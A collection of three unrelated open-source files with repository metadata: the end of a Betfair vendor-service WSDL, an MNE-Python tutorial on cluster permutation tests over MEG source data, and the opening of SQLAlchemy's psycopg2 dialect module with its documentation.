<xsd:element name="setAccessRequest">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="request" type="types:SetAccessRequestReq"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="setAccessRequestResponse">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="Result" nillable="true" type="types:SetAccessRequestResp"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="cancelVendorAccessRequest">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="request" type="types:CancelVendorAccessRequestReq"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="cancelVendorAccessRequestResponse">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="Result" nillable="true" type="types:CancelVendorAccessRequestResp"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="getVendorAccessRequests">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="request" type="types:GetVendorAccessRequestsReq"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="getVendorAccessRequestsResponse">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="Result" nillable="true" type="types:GetVendorAccessRequestsResp"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="createVendorAccessRequest">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="request" type="types:CreateVendorAccessRequestReq"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="createVendorAccessRequestResponse">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="Result" nillable="true" type="types:CreateVendorAccessRequestResp"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="addVendorSubscription">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="request" type="types:VendorSubscriptionReq"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="addVendorSubscriptionResponse">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="Result" nillable="true" type="types:VendorSubscriptionResp"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="updateVendorSubscription">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="request" type="types:VendorSubscriptionReq"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="updateVendorSubscriptionResponse">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="Result" nillable="true" type="types:VendorSubscriptionResp"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="cancelVendorSubscription">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="request" type="types:CancelVendorSubscriptionReq"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="cancelVendorSubscriptionResponse">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="Result" nillable="true" type="types:CancelVendorSubscriptionResp"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="getSubscriptionInfo">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="request" type="types:GetSubscriptionInfoReq"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="getSubscriptionInfoResponse">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="Result" nillable="true" type="types:GetSubscriptionInfoResp"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="getVendorInfo">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="request" type="types:GetVendorInfoReq"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="getVendorInfoResponse">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="Result" nillable="true" type="types:GetVendorInfoResp"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="getVendorUsers">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="request" type="types:GetVendorUsersReq"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="getVendorUsersResponse">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="Result" nillable="true" type="types:GetVendorUsersResp"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
</xsd:schema>
</wsdl:types>
<wsdl:message name="setAccessRequestIn">
<wsdl:part element="tns:setAccessRequest" name="parameters"/>
</wsdl:message>
<wsdl:message name="setAccessRequestOut">
<wsdl:part element="tns:setAccessRequestResponse" name="parameters"/>
</wsdl:message>
<wsdl:message name="cancelVendorAccessRequestIn">
<wsdl:part element="tns:cancelVendorAccessRequest" name="parameters"/>
</wsdl:message>
<wsdl:message name="cancelVendorAccessRequestOut">
<wsdl:part element="tns:cancelVendorAccessRequestResponse" name="parameters"/>
</wsdl:message>
<wsdl:message name="getVendorAccessRequestsIn">
<wsdl:part element="tns:getVendorAccessRequests" name="parameters"/>
</wsdl:message>
<wsdl:message name="getVendorAccessRequestsOut">
<wsdl:part element="tns:getVendorAccessRequestsResponse" name="parameters"/>
</wsdl:message>
<wsdl:message name="createVendorAccessRequestIn">
<wsdl:part element="tns:createVendorAccessRequest" name="parameters"/>
</wsdl:message>
<wsdl:message name="createVendorAccessRequestOut">
<wsdl:part element="tns:createVendorAccessRequestResponse" name="parameters"/>
</wsdl:message>
<wsdl:message name="addVendorSubscriptionIn">
<wsdl:part element="tns:addVendorSubscription" name="parameters"/>
</wsdl:message>
<wsdl:message name="addVendorSubscriptionOut">
<wsdl:part element="tns:addVendorSubscriptionResponse" name="parameters"/>
</wsdl:message>
<wsdl:message name="updateVendorSubscriptionIn">
<wsdl:part element="tns:updateVendorSubscription" name="parameters"/>
</wsdl:message>
<wsdl:message name="updateVendorSubscriptionOut">
<wsdl:part element="tns:updateVendorSubscriptionResponse" name="parameters"/>
</wsdl:message>
<wsdl:message name="cancelVendorSubscriptionIn">
<wsdl:part element="tns:cancelVendorSubscription" name="parameters"/>
</wsdl:message>
<wsdl:message name="cancelVendorSubscriptionOut">
<wsdl:part element="tns:cancelVendorSubscriptionResponse" name="parameters"/>
</wsdl:message>
<wsdl:message name="getSubscriptionInfoIn">
<wsdl:part element="tns:getSubscriptionInfo" name="parameters"/>
</wsdl:message>
<wsdl:message name="getSubscriptionInfoOut">
<wsdl:part element="tns:getSubscriptionInfoResponse" name="parameters"/>
</wsdl:message>
<wsdl:message name="getVendorInfoIn">
<wsdl:part element="tns:getVendorInfo" name="parameters"/>
</wsdl:message>
<wsdl:message name="getVendorInfoOut">
<wsdl:part element="tns:getVendorInfoResponse" name="parameters"/>
</wsdl:message>
<wsdl:message name="getVendorUsersIn">
<wsdl:part element="tns:getVendorUsers" name="parameters"/>
</wsdl:message>
<wsdl:message name="getVendorUsersOut">
<wsdl:part element="tns:getVendorUsersResponse" name="parameters"/>
</wsdl:message>
<wsdl:portType name="VendorService">
<wsdl:operation name="setAccessRequest">
<wsdl:input message="tns:setAccessRequestIn" name="setAccessRequestIn"/>
<wsdl:output message="tns:setAccessRequestOut" name="setAccessRequestOut"/>
</wsdl:operation>
<wsdl:operation name="cancelVendorAccessRequest">
<wsdl:input message="tns:cancelVendorAccessRequestIn" name="cancelVendorAccessRequestIn"/>
<wsdl:output message="tns:cancelVendorAccessRequestOut" name="cancelVendorAccessRequestOut"/>
</wsdl:operation>
<wsdl:operation name="getVendorAccessRequests">
<wsdl:input message="tns:getVendorAccessRequestsIn" name="getVendorAccessRequestsIn"/>
<wsdl:output message="tns:getVendorAccessRequestsOut" name="getVendorAccessRequestsOut"/>
</wsdl:operation>
<wsdl:operation name="createVendorAccessRequest">
<wsdl:input message="tns:createVendorAccessRequestIn" name="createVendorAccessRequestIn"/>
<wsdl:output message="tns:createVendorAccessRequestOut" name="createVendorAccessRequestOut"/>
</wsdl:operation>
<wsdl:operation name="addVendorSubscription">
<wsdl:input message="tns:addVendorSubscriptionIn" name="addVendorSubscriptionIn"/>
<wsdl:output message="tns:addVendorSubscriptionOut" name="addVendorSubscriptionOut"/>
</wsdl:operation>
<wsdl:operation name="updateVendorSubscription">
<wsdl:input message="tns:updateVendorSubscriptionIn" name="updateVendorSubscriptionIn"/>
<wsdl:output message="tns:updateVendorSubscriptionOut" name="updateVendorSubscriptionOut"/>
</wsdl:operation>
<wsdl:operation name="cancelVendorSubscription">
<wsdl:input message="tns:cancelVendorSubscriptionIn" name="cancelVendorSubscriptionIn"/>
<wsdl:output message="tns:cancelVendorSubscriptionOut" name="cancelVendorSubscriptionOut"/>
</wsdl:operation>
<wsdl:operation name="getSubscriptionInfo">
<wsdl:input message="tns:getSubscriptionInfoIn" name="getSubscriptionInfoIn"/>
<wsdl:output message="tns:getSubscriptionInfoOut" name="getSubscriptionInfoOut"/>
</wsdl:operation>
<wsdl:operation name="getVendorInfo">
<wsdl:input message="tns:getVendorInfoIn" name="getVendorInfoIn"/>
<wsdl:output message="tns:getVendorInfoOut" name="getVendorInfoOut"/>
</wsdl:operation>
<wsdl:operation name="getVendorUsers">
<wsdl:input message="tns:getVendorUsersIn" name="getVendorUsersIn"/>
<wsdl:output message="tns:getVendorUsersOut" name="getVendorUsersOut"/>
</wsdl:operation>
</wsdl:portType>
<wsdl:binding name="VendorService" type="tns:VendorService">
<soap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>
<wsdl:operation name="setAccessRequest">
<soap:operation soapAction="setAccessRequest" style="document"/>
<wsdl:input name="setAccessRequestIn">
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output name="setAccessRequestOut">
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="cancelVendorAccessRequest">
<soap:operation soapAction="cancelVendorAccessRequest" style="document"/>
<wsdl:input name="cancelVendorAccessRequestIn">
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output name="cancelVendorAccessRequestOut">
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="getVendorAccessRequests">
<soap:operation soapAction="getVendorAccessRequests" style="document"/>
<wsdl:input name="getVendorAccessRequestsIn">
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output name="getVendorAccessRequestsOut">
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="createVendorAccessRequest">
<soap:operation soapAction="createVendorAccessRequest" style="document"/>
<wsdl:input name="createVendorAccessRequestIn">
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output name="createVendorAccessRequestOut">
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="addVendorSubscription">
<soap:operation soapAction="addVendorSubscription" style="document"/>
<wsdl:input name="addVendorSubscriptionIn">
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output name="addVendorSubscriptionOut">
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="updateVendorSubscription">
<soap:operation soapAction="updateVendorSubscription" style="document"/>
<wsdl:input name="updateVendorSubscriptionIn">
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output name="updateVendorSubscriptionOut">
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="cancelVendorSubscription">
<soap:operation soapAction="cancelVendorSubscription" style="document"/>
<wsdl:input name="cancelVendorSubscriptionIn">
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output name="cancelVendorSubscriptionOut">
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="getSubscriptionInfo">
<soap:operation soapAction="getSubscriptionInfo" style="document"/>
<wsdl:input name="getSubscriptionInfoIn">
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output name="getSubscriptionInfoOut">
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="getVendorInfo">
<soap:operation soapAction="getVendorInfo" style="document"/>
<wsdl:input name="getVendorInfoIn">
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output name="getVendorInfoOut">
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="getVendorUsers">
<soap:operation soapAction="getVendorUsers" style="document"/>
<wsdl:input name="getVendorUsersIn">
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output name="getVendorUsersOut">
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
</wsdl:binding>
<wsdl:service name="VendorService">
<wsdl:port binding="tns:VendorService" name="VendorService">
<soap:address location="https://api.betfair.com/admin-api/v2/VendorService"/>
</wsdl:port>
</wsdl:service>
</wsdl:definitions>
'''
|
{
"content_hash": "056af675ef0f6b255c80b0f8cdca6e00",
"timestamp": "",
"source": "github",
"line_count": 828,
"max_line_length": 459,
"avg_line_length": 44.828502415458935,
"alnum_prop": 0.6550999515060079,
"repo_name": "kells1986/Betfair-Finktank-Tool",
"id": "8a4d329fc1ff0790d154958b83432e27b2280ce4",
"size": "38260",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "bft/bfpy/bfwsdl/bfvendor.py",
"mode": "33261",
"license": "mit",
"language": [],
"symlink_target": ""
}
|
"""
.. _tut_stats_cluster_source_1samp:
=================================================================
Permutation t-test on source data with spatio-temporal clustering
=================================================================
Tests if the evoked response is significantly different between
conditions across subjects (simulated here using one subject's data).
The multiple comparisons problem is addressed with a cluster-level
permutation test across space and time.
"""
# Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Eric Larson <larson.eric.d@gmail.com>
# License: BSD (3-clause)
import os.path as op
import numpy as np
from numpy.random import randn
from scipy import stats as stats
import mne
from mne import (io, spatial_tris_connectivity, compute_morph_matrix,
grade_to_tris)
from mne.epochs import equalize_epoch_counts
from mne.stats import (spatio_temporal_cluster_1samp_test,
summarize_clusters_stc)
from mne.minimum_norm import apply_inverse, read_inverse_operator
from mne.datasets import sample
print(__doc__)
###############################################################################
# Set parameters
# --------------
data_path = sample.data_path()
raw_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw.fif'
event_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw-eve.fif'
subjects_dir = data_path + '/subjects'
tmin = -0.2
tmax = 0.3 # Use a lower tmax to reduce multiple comparisons
# Setup for reading the raw data
raw = io.read_raw_fif(raw_fname)
events = mne.read_events(event_fname)
###############################################################################
# Read epochs for all channels, removing a bad one
# ------------------------------------------------
raw.info['bads'] += ['MEG 2443']
picks = mne.pick_types(raw.info, meg=True, eog=True, exclude='bads')
event_id = 1 # L auditory
reject = dict(grad=1000e-13, mag=4000e-15, eog=150e-6)
epochs1 = mne.Epochs(raw, events, event_id, tmin, tmax, picks=picks,
baseline=(None, 0), reject=reject, preload=True)
event_id = 3 # L visual
epochs2 = mne.Epochs(raw, events, event_id, tmin, tmax, picks=picks,
baseline=(None, 0), reject=reject, preload=True)
# Equalize trial counts to eliminate bias (which would otherwise be
# introduced by the abs() performed below)
equalize_epoch_counts([epochs1, epochs2])
###############################################################################
# Transform to source space
# -------------------------
fname_inv = data_path + '/MEG/sample/sample_audvis-meg-oct-6-meg-inv.fif'
snr = 3.0
lambda2 = 1.0 / snr ** 2
method = "dSPM" # use dSPM method (could also be MNE or sLORETA)
inverse_operator = read_inverse_operator(fname_inv)
sample_vertices = [s['vertno'] for s in inverse_operator['src']]
# Let's average and compute inverse, resampling to speed things up
evoked1 = epochs1.average()
evoked1.resample(50, npad='auto')
condition1 = apply_inverse(evoked1, inverse_operator, lambda2, method)
evoked2 = epochs2.average()
evoked2.resample(50, npad='auto')
condition2 = apply_inverse(evoked2, inverse_operator, lambda2, method)
# Let's only deal with t > 0, cropping to reduce multiple comparisons
condition1.crop(0, None)
condition2.crop(0, None)
tmin = condition1.tmin
tstep = condition1.tstep
###############################################################################
# Transform to common cortical space
# ----------------------------------
#
# Normally you would read in estimates across several subjects and morph
# them to the same cortical space (e.g. fsaverage). For example purposes,
# we will simulate this by just having each "subject" have the same
# response (just noisy in source space) here.
#
# .. note::
# Note that for 7 subjects with a two-sided statistical test, the minimum
# significance under a permutation test is only p = 1/(2 ** 6) = 0.015,
# which is large.
n_vertices_sample, n_times = condition1.data.shape
n_subjects = 7
print('Simulating data for %d subjects.' % n_subjects)
# Let's make sure our results replicate, so set the seed.
np.random.seed(0)
X = randn(n_vertices_sample, n_times, n_subjects, 2) * 10
X[:, :, :, 0] += condition1.data[:, :, np.newaxis]
X[:, :, :, 1] += condition2.data[:, :, np.newaxis]
###############################################################################
# It's a good idea to spatially smooth the data, and for visualization
# purposes, let's morph these to fsaverage, which is a grade 5 source space
# with vertices 0:10242 for each hemisphere. Usually you'd have to morph
# each subject's data separately (and you might want to use morph_data
# instead), but here since all estimates are on 'sample' we can use one
# morph matrix for all the heavy lifting.
fsave_vertices = [np.arange(10242), np.arange(10242)]
morph_mat = compute_morph_matrix('sample', 'fsaverage', sample_vertices,
fsave_vertices, 20, subjects_dir)
n_vertices_fsave = morph_mat.shape[0]
# We have to change the shape for the dot() to work properly
X = X.reshape(n_vertices_sample, n_times * n_subjects * 2)
print('Morphing data.')
X = morph_mat.dot(X) # morph_mat is a sparse matrix
X = X.reshape(n_vertices_fsave, n_times, n_subjects, 2)
###############################################################################
# Finally, we want to compare the overall activity levels in each condition,
# the diff is taken along the last axis (condition). The negative sign makes
# it so condition1 > condition2 shows up as "red blobs" (instead of blue).
X = np.abs(X) # only magnitude
X = X[:, :, :, 0] - X[:, :, :, 1] # make paired contrast
###############################################################################
# Compute statistic
# -----------------
#
# To use an algorithm optimized for spatio-temporal clustering, we
# just pass the spatial connectivity matrix (instead of spatio-temporal)
print('Computing connectivity.')
connectivity = spatial_tris_connectivity(grade_to_tris(5))
# Note that X needs to be a multi-dimensional array of shape
# samples (subjects) x time x space, so we permute dimensions
X = np.transpose(X, [2, 1, 0])
# Now let's actually do the clustering. This can take a long time...
# Here we set the threshold quite high to reduce computation.
p_threshold = 0.001
t_threshold = -stats.distributions.t.ppf(p_threshold / 2., n_subjects - 1)
print('Clustering.')
T_obs, clusters, cluster_p_values, H0 = clu = \
spatio_temporal_cluster_1samp_test(X, connectivity=connectivity, n_jobs=1,
threshold=t_threshold)
# Now select the clusters that are sig. at p < 0.05 (note that this value
# is multiple-comparisons corrected).
good_cluster_inds = np.where(cluster_p_values < 0.05)[0]
###############################################################################
# Visualize the clusters
# ----------------------
print('Visualizing clusters.')
# Now let's build a convenient representation of each cluster, where each
# cluster becomes a "time point" in the SourceEstimate
stc_all_cluster_vis = summarize_clusters_stc(clu, tstep=tstep,
vertices=fsave_vertices,
subject='fsaverage')
# Let's actually plot the first "time point" in the SourceEstimate, which
# shows all the clusters, weighted by duration
subjects_dir = op.join(data_path, 'subjects')
# blue blobs are for condition A < condition B, red for A > B
brain = stc_all_cluster_vis.plot(hemi='both', views='lateral',
subjects_dir=subjects_dir,
time_label='Duration significant (ms)')
brain.save_image('clusters.png')
|
{
"content_hash": "787e15d678d2ea682df12c98afd23ab2",
"timestamp": "",
"source": "github",
"line_count": 186,
"max_line_length": 79,
"avg_line_length": 42.166666666666664,
"alnum_prop": 0.613795741425475,
"repo_name": "nicproulx/mne-python",
"id": "059b34d99f390700def7d47b323e231bc29e2799",
"size": "7843",
"binary": false,
"copies": "9",
"ref": "refs/heads/placeholder",
"path": "tutorials/plot_stats_cluster_spatio_temporal.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Csound Document",
"bytes": "69806"
},
{
"name": "Makefile",
"bytes": "3723"
},
{
"name": "Python",
"bytes": "5866703"
},
{
"name": "Shell",
"bytes": "936"
}
],
"symlink_target": ""
}
|
"""
.. dialect:: postgresql+psycopg2
:name: psycopg2
:dbapi: psycopg2
:connectstring: postgresql+psycopg2://user:password@host:port/dbname[?key=value&key=value...]
:url: http://pypi.python.org/pypi/psycopg2/
psycopg2 Connect Arguments
-----------------------------------
psycopg2-specific keyword arguments which are accepted by
:func:`.create_engine()` are:
* ``server_side_cursors``: Enable the usage of "server side cursors" for SQL
statements which support this feature. What this essentially means from a
psycopg2 point of view is that the cursor is created using a name, e.g.
``connection.cursor('some name')``, which has the effect that result rows are
not immediately pre-fetched and buffered after statement execution, but are
instead left on the server and only retrieved as needed. SQLAlchemy's
:class:`~sqlalchemy.engine.ResultProxy` uses special row-buffering
behavior when this feature is enabled, such that groups of 100 rows at a
time are fetched over the wire to reduce conversational overhead.
Note that the ``stream_results=True`` execution option is a more targeted
way of enabling this mode on a per-execution basis.
* ``use_native_unicode``: Enable the usage of Psycopg2 "native unicode" mode
per connection. True by default.
* ``isolation_level``: This option, available for all PostgreSQL dialects,
includes the ``AUTOCOMMIT`` isolation level when using the psycopg2
dialect. See :ref:`psycopg2_isolation_level`.
Unix Domain Connections
------------------------
psycopg2 supports connecting via Unix domain connections. When the ``host``
portion of the URL is omitted, SQLAlchemy passes ``None`` to psycopg2,
which specifies Unix-domain communication rather than TCP/IP communication::
create_engine("postgresql+psycopg2://user:password@/dbname")
By default, the socket file used is to connect to a Unix-domain socket
in ``/tmp``, or whatever socket directory was specified when PostgreSQL
was built. This value can be overridden by passing a pathname to psycopg2,
using ``host`` as an additional keyword argument::
create_engine("postgresql+psycopg2://user:password@/dbname?host=/var/lib/postgresql")
See also:
`PQconnectdbParams <http://www.postgresql.org/docs/9.1/static/libpq-connect.html#LIBPQ-PQCONNECTDBPARAMS>`_
Per-Statement/Connection Execution Options
-------------------------------------------
The following DBAPI-specific options are respected when used with
:meth:`.Connection.execution_options`, :meth:`.Executable.execution_options`,
:meth:`.Query.execution_options`, in addition to those not specific to DBAPIs:
* isolation_level - Set the transaction isolation level for the lifespan of a
:class:`.Connection` (can only be set on a connection, not a statement
or query). See :ref:`psycopg2_isolation_level`.
* stream_results - Enable or disable usage of psycopg2 server side cursors -
this feature makes use of "named" cursors in combination with special
result handling methods so that result rows are not fully buffered.
If ``None`` or not set, the ``server_side_cursors`` option of the
:class:`.Engine` is used.
Unicode
-------
By default, the psycopg2 driver uses the ``psycopg2.extensions.UNICODE``
extension, such that the DBAPI receives and returns all strings as Python
Unicode objects directly - SQLAlchemy passes these values through without
change. Psycopg2 here will encode/decode string values based on the
current "client encoding" setting; by default this is the value in
the ``postgresql.conf`` file, which often defaults to ``SQL_ASCII``.
Typically, this can be changed to ``utf-8``, as a more useful default::
#client_encoding = sql_ascii # actually, defaults to database
# encoding
client_encoding = utf8
A second way to affect the client encoding is to set it within Psycopg2
locally. SQLAlchemy will call psycopg2's ``set_client_encoding()``
method (see: http://initd.org/psycopg/docs/connection.html#connection.set_client_encoding)
on all new connections based on the value passed to
:func:`.create_engine` using the ``client_encoding`` parameter::
engine = create_engine("postgresql://user:pass@host/dbname", client_encoding='utf8')
This overrides the encoding specified in the Postgresql client configuration.
.. versionadded:: 0.7.3
The psycopg2-specific ``client_encoding`` parameter to
:func:`.create_engine`.
SQLAlchemy can also be instructed to skip the usage of the psycopg2
``UNICODE`` extension and to instead utilize its own unicode encode/decode
services, which are normally reserved only for those DBAPIs that don't
fully support unicode directly. Passing ``use_native_unicode=False`` to
:func:`.create_engine` will disable usage of ``psycopg2.extensions.UNICODE``.
SQLAlchemy will instead encode data itself into Python bytestrings on the way
in and coerce from bytes on the way back,
using the value of the :func:`.create_engine` ``encoding`` parameter, which
defaults to ``utf-8``.
SQLAlchemy's own unicode encode/decode functionality is steadily becoming
obsolete as more DBAPIs support unicode fully along with the approach of
Python 3; in modern usage psycopg2 should be relied upon to handle unicode.
Transactions
------------
The psycopg2 dialect fully supports SAVEPOINT and two-phase commit operations.
.. _psycopg2_isolation_level:
Psycopg2 Transaction Isolation Level
-------------------------------------
As discussed in :ref:`postgresql_isolation_level`,
all Postgresql dialects support setting of transaction isolation level
both via the ``isolation_level`` parameter passed to :func:`.create_engine`,
as well as the ``isolation_level`` argument used by :meth:`.Connection.execution_options`.
When using the psycopg2 dialect, these options make use of
psycopg2's ``set_isolation_level()`` connection method, rather than
emitting a Postgresql directive; this is because psycopg2's API-level
setting is always emitted at the start of each transaction in any case.
The psycopg2 dialect supports these constants for isolation level:
* ``READ COMMITTED``
* ``READ UNCOMMITTED``
* ``REPEATABLE READ``
* ``SERIALIZABLE``
* ``AUTOCOMMIT``
.. versionadded:: 0.8.2 support for AUTOCOMMIT isolation level when using
psycopg2.
.. seealso::
:ref:`postgresql_isolation_level`
:ref:`pg8000_isolation_level`
NOTICE logging
---------------
The psycopg2 dialect will log Postgresql NOTICE messages via the
``sqlalchemy.dialects.postgresql`` logger::
import logging
logging.getLogger('sqlalchemy.dialects.postgresql').setLevel(logging.INFO)
.. _psycopg2_hstore::
HSTORE type
------------
The ``psycopg2`` DBAPI includes an extension to natively handle marshalling of the
HSTORE type. The SQLAlchemy psycopg2 dialect will enable this extension
by default when it is detected that the target database has the HSTORE
type set up for use. In other words, when the dialect makes the first
connection, a sequence like the following is performed:
1. Request the available HSTORE oids using ``psycopg2.extras.HstoreAdapter.get_oids()``.
If this function returns a list of HSTORE identifiers, we then determine that
the ``HSTORE`` extension is present.
2. If the ``use_native_hstore`` flag is at its default of ``True``, and
we've detected that ``HSTORE`` oids are available, the
``psycopg2.extensions.register_hstore()`` extension is invoked for all
connections.
The ``register_hstore()`` extension has the effect of **all Python dictionaries
being accepted as parameters regardless of the type of target column in SQL**.
The dictionaries are converted by this extension into a textual HSTORE expression.
If this behavior is not desired, disable the
use of the hstore extension by setting ``use_native_hstore`` to ``False`` as follows::
engine = create_engine("postgresql+psycopg2://scott:tiger@localhost/test",
use_native_hstore=False)
The ``HSTORE`` type is **still supported** when the ``psycopg2.extensions.register_hstore()``
extension is not used. It merely means that the coercion between Python dictionaries and the HSTORE
string format, on both the parameter side and the result side, will take
place within SQLAlchemy's own marshalling logic, and not that of ``psycopg2`` which
may be more performant.
"""
from __future__ import absolute_import
import re
import logging
from ... import util, exc
import decimal
from ... import processors
from ...engine import result as _result
from ...sql import expression
from ... import types as sqltypes
from .base import PGDialect, PGCompiler, \
PGIdentifierPreparer, PGExecutionContext, \
ENUM, ARRAY, _DECIMAL_TYPES, _FLOAT_TYPES,\
_INT_TYPES
from .hstore import HSTORE
from .json import JSON
logger = logging.getLogger('sqlalchemy.dialects.postgresql')
class _PGNumeric(sqltypes.Numeric):
def bind_processor(self, dialect):
return None
def result_processor(self, dialect, coltype):
if self.asdecimal:
if coltype in _FLOAT_TYPES:
return processors.to_decimal_processor_factory(
decimal.Decimal,
self._effective_decimal_return_scale)
elif coltype in _DECIMAL_TYPES or coltype in _INT_TYPES:
# pg8000 returns Decimal natively for 1700
return None
else:
raise exc.InvalidRequestError(
"Unknown PG numeric type: %d" % coltype)
else:
if coltype in _FLOAT_TYPES:
# pg8000 returns float natively for 701
return None
elif coltype in _DECIMAL_TYPES or coltype in _INT_TYPES:
return processors.to_float
else:
raise exc.InvalidRequestError(
"Unknown PG numeric type: %d" % coltype)
class _PGEnum(ENUM):
def result_processor(self, dialect, coltype):
if util.py2k and self.convert_unicode is True:
# we can't easily use PG's extensions here because
# the OID is on the fly, and we need to give it a python
# function anyway - not really worth it.
self.convert_unicode = "force_nocheck"
return super(_PGEnum, self).result_processor(dialect, coltype)
class _PGHStore(HSTORE):
def bind_processor(self, dialect):
if dialect._has_native_hstore:
return None
else:
return super(_PGHStore, self).bind_processor(dialect)
def result_processor(self, dialect, coltype):
if dialect._has_native_hstore:
return None
else:
return super(_PGHStore, self).result_processor(dialect, coltype)
class _PGJSON(JSON):
def result_processor(self, dialect, coltype):
if dialect._has_native_json:
return None
else:
return super(_PGJSON, self).result_processor(dialect, coltype)
# When we're handed literal SQL, ensure it's a SELECT query. Since
# 8.3, combining cursors and "FOR UPDATE" has been fine.
SERVER_SIDE_CURSOR_RE = re.compile(
r'\s*SELECT',
re.I | re.UNICODE)
_server_side_id = util.counter()
class PGExecutionContext_psycopg2(PGExecutionContext):
def create_cursor(self):
# TODO: coverage for server side cursors + select.for_update()
if self.dialect.server_side_cursors:
is_server_side = \
self.execution_options.get('stream_results', True) and (
(self.compiled and isinstance(self.compiled.statement, expression.Selectable) \
or \
(
(not self.compiled or
isinstance(self.compiled.statement, expression.TextClause))
and self.statement and SERVER_SIDE_CURSOR_RE.match(self.statement))
)
)
else:
is_server_side = \
self.execution_options.get('stream_results', False)
self.__is_server_side = is_server_side
if is_server_side:
# use server-side cursors:
# http://lists.initd.org/pipermail/psycopg/2007-January/005251.html
ident = "c_%s_%s" % (hex(id(self))[2:], hex(_server_side_id())[2:])
return self._dbapi_connection.cursor(ident)
else:
return self._dbapi_connection.cursor()
def get_result_proxy(self):
# TODO: ouch
if logger.isEnabledFor(logging.INFO):
self._log_notices(self.cursor)
if self.__is_server_side:
return _result.BufferedRowResultProxy(self)
else:
return _result.ResultProxy(self)
def _log_notices(self, cursor):
for notice in cursor.connection.notices:
# NOTICE messages have a
# newline character at the end
logger.info(notice.rstrip())
cursor.connection.notices[:] = []
class PGCompiler_psycopg2(PGCompiler):
def visit_mod_binary(self, binary, operator, **kw):
return self.process(binary.left, **kw) + " %% " + \
self.process(binary.right, **kw)
def post_process_text(self, text):
return text.replace('%', '%%')
class PGIdentifierPreparer_psycopg2(PGIdentifierPreparer):
def _escape_identifier(self, value):
value = value.replace(self.escape_quote, self.escape_to_quote)
return value.replace('%', '%%')
class PGDialect_psycopg2(PGDialect):
driver = 'psycopg2'
if util.py2k:
supports_unicode_statements = False
default_paramstyle = 'pyformat'
supports_sane_multi_rowcount = False # set to true based on psycopg2 version
execution_ctx_cls = PGExecutionContext_psycopg2
statement_compiler = PGCompiler_psycopg2
preparer = PGIdentifierPreparer_psycopg2
psycopg2_version = (0, 0)
_has_native_hstore = False
_has_native_json = False
colspecs = util.update_copy(
PGDialect.colspecs,
{
sqltypes.Numeric: _PGNumeric,
ENUM: _PGEnum, # needs force_unicode
sqltypes.Enum: _PGEnum, # needs force_unicode
HSTORE: _PGHStore,
JSON: _PGJSON
}
)
def __init__(self, server_side_cursors=False, use_native_unicode=True,
client_encoding=None,
use_native_hstore=True,
**kwargs):
